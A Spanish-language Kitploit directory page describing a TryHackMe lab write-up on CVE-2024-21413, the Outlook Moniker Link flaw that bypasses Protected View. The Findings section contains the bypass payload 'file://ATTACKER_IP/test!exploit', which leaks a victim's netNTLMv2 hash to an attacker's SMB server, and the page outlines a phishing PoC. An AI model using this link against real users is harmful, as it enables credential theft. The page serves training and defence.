Skip to content
KitploitKITPLOIT
HerramientasBlog
Log in
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

FeedsContactoPrivacidad© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
THM---CVE-2024-21413-Moniker-Link-Microsoft-Outlook- — El 13 de febrero de 2024, Microsoft publicó una grave vulnerabilidad de seguridad en Microsoft Outlook, identificada como CVE-2024-21413, conocida como Moniker Link Vulnerability. La vulnerabilidad permite a un atacante eludir el mecanismo Protected View de Outlook. | Kitploit
Herramientas/GitHubGitHub/eylommaayan/thm---cve-2024-21413-moniker-link-microsoft-outlook-
Análisis de VulnerabilidadesExplotaciónPruebas de PenetraciónAprendizaje y EducaciónSeguridad de Correo ElectrónicoLabs y Práctica
GitHubeylommaayan/thm---cve-2024-21413-moniker-link-microsoft-outlook-

THM---CVE-2024-21413-Moniker-Link-Microsoft-Outlook-

El 13 de febrero de 2024, Microsoft publicó una grave vulnerabilidad de seguridad en Microsoft Outlook, identificada como CVE-2024-21413, conocida como Moniker Link Vulnerability. La vulnerabilidad permite a un atacante eludir el mecanismo Protected View de Outlook.

Ver Repositorio
13hace 9 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

THM---CVE-2024-21413-Moniker-Link-Microsoft-Outlook-

El 13 de febrero de 2024, Microsoft publicó una grave vulnerabilidad de seguridad en Microsoft Outlook, identificada como CVE-2024-21413 y conocida como Moniker Link Vulnerability. La vulnerabilidad permite a un atacante eludir el mecanismo Protected View de Outlook. image

Excelente 👍 A continuación se presenta una traducción completa redactada como informe de Penetration Testing (PT), en español profesional y claro. Como solicitaste – solo traducción y redacción. Las respuestas, capturas y detalles los agregarás tú; si lo deseas más adelante, te ayudaré.


Informe de Penetration Testing

CVE-2024-21413 – Moniker Link (Microsoft Outlook)


🧩 Resumen Ejecutivo (Executive Summary)

El 13 de febrero de 2024, Microsoft publicó una grave vulnerabilidad de seguridad en Microsoft Outlook, identificada como CVE-2024-21413 y conocida como Moniker Link Vulnerability.

La vulnerabilidad permite a un atacante eludir el mecanismo Protected View de Outlook mediante un enlace especial (Moniker Link), haciendo que el cliente Outlook de la víctima envíe sus credenciales de inicio de sesión (hash NTLM) a un servidor controlado por el atacante – sin ejecutar ningún archivo ni mostrar una advertencia de seguridad efectiva.

La vulnerabilidad puede conllevar a una filtración de credenciales e incluso existe la posibilidad teórica de ejecución remota de código (RCE).


📌 Detalles de la vulnerabilidad

ParámetroValor
IdentificadorCVE-2024-21413
Fecha de publicación13 de febrero de 2024
DescubridorHaifei Li – Check Point Research
ImpactoFiltración de credenciales + posible RCE
GravedadCrítica
Complejidad de ataqueBaja
Puntuación CVSS9.8
Enlace oficialhttps://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2024-21413

🎯 Versiones afectadas

La vulnerabilidad afecta a las siguientes versiones:

  • Microsoft Office LTSC 2021 – desde versión 19.0.0
  • Microsoft 365 Apps for Enterprise – desde versión 16.0.1
  • Microsoft Office 2019 – desde versión 16.0.1
  • Microsoft Office 2016 – antes de la versión 16.0.5435.1001

🎓 Objetivos de aprendizaje (Learning Objectives)

  • Comprender el funcionamiento de la vulnerabilidad
  • Conocer el mecanismo Protected View de Outlook
  • Explotar la vulnerabilidad para filtrar credenciales
  • Medidas de detección (Detection)
  • Recomendaciones de mitigación (Mitigation)

(Descripción de la vulnerabilidad)

image

Microsoft Outlook permite mostrar correos electrónicos en formato HTML y analizar enlaces de diversos tipos, como http:// y https://. Además, Outlook también es compatible con enlaces especiales llamados Moniker Links, que permiten ejecutar aplicaciones o acceder a recursos externos del sistema operativo.

En condiciones normales, cuando un correo contiene un enlace que ejecuta una aplicación externa o accede a un recurso del sistema (como un enlace file://), se activa el mecanismo de seguridad Protected View de Outlook. Este mecanismo muestra una advertencia de seguridad y bloquea acciones peligrosas como la ejecución de código, macros o el acceso a recursos de red externos.

Sin embargo, se descubrió una vulnerabilidad en Outlook (CVE-2024-21413) que permite eludir el mecanismo Protected View mediante una simple manipulación de un enlace de tipo Moniker Link.

Hallazgos (Findings)

Durante la prueba se descubrió que el uso de un enlace normal del tipo:

file://ATTACKER_IP/test

hace que Outlook intente acceder a un recurso de red mediante el protocolo SMB, pero este intento es bloqueado por Protected View.

En cambio, cuando el enlace incluye el carácter especial ! y una cadena de texto adicional, por ejemplo:

file://ATTACKER_IP/test!exploit

Outlook no activa Protected View y realiza un intento de conexión al servidor remoto.

Durante este intento:

  • Outlook intenta acceder al recurso a través de SMB
  • Se realiza una solicitud de autenticación automática
  • Las credenciales de inicio de sesión del usuario se envían al atacante
  • Se captura el hash netNTLMv2 de Windows de la víctima

Es importante señalar que el recurso compartido remoto no tiene por qué existir realmente, ya que el intento de autenticación se realiza de todos modos.

Impacto (Impact)

La vulnerabilidad permite al atacante:

  • Filtrar credenciales de usuario (hash netNTLMv2)
  • Realizar ataques offline (Cracking / Pass-the-Hash)
  • Movimiento lateral en la red corporativa

Además, dado que Moniker Links utiliza el mecanismo COM (Component Object Model) de Windows, existe la posibilidad teórica de ejecución remota de código (RCE). Sin embargo, hasta la fecha de la prueba, no existe un Proof of Concept público que demuestre RCE real mediante esta vulnerabilidad.

Explotación de la vulnerabilidad (Exploitation)

En el marco del ataque, se envía a la víctima un correo que contiene un Moniker Link similar al mostrado en la tarea anterior. El objetivo del atacante es crear un correo con un enlace Moniker Link que eluda el mecanismo Protected View de Outlook, de modo que cuando la víctima haga clic en el enlace, su cliente Outlook intente cargar un archivo desde la máquina del atacante. Esta acción provoca que el hash netNTLMv2 de la víctima se envíe y sea capturado por el atacante.

Antes de realizar el ataque, revisaremos un Proof of Concept (PoC) creado con fines de demostración (y también disponible en GitHub).

Autor: CMNatic | https://github.com/cmnatic Versión: 1.0 | 19/02/2024

El código utiliza el lenguaje Python y envía un correo HTML que contiene un enlace Moniker Link malicioso.

Descripción del PoC

El PoC:

  • Recibe una dirección de correo del atacante y una dirección de correo de la víctima
  • Solicita una contraseña para autenticación SMTP (En esta sala, la contraseña para [email protected] es: attacker)
  • Contiene el contenido HTML del correo (html_content) con un enlace Moniker Link malicioso
  • Define los campos del correo: Asunto, De, Para
  • Envía el correo a través del servidor de correo

En un escenario real, se necesita un servidor SMTP controlado por el atacante (en esta sala, el servidor ya está proporcionado).

Descargar herramienta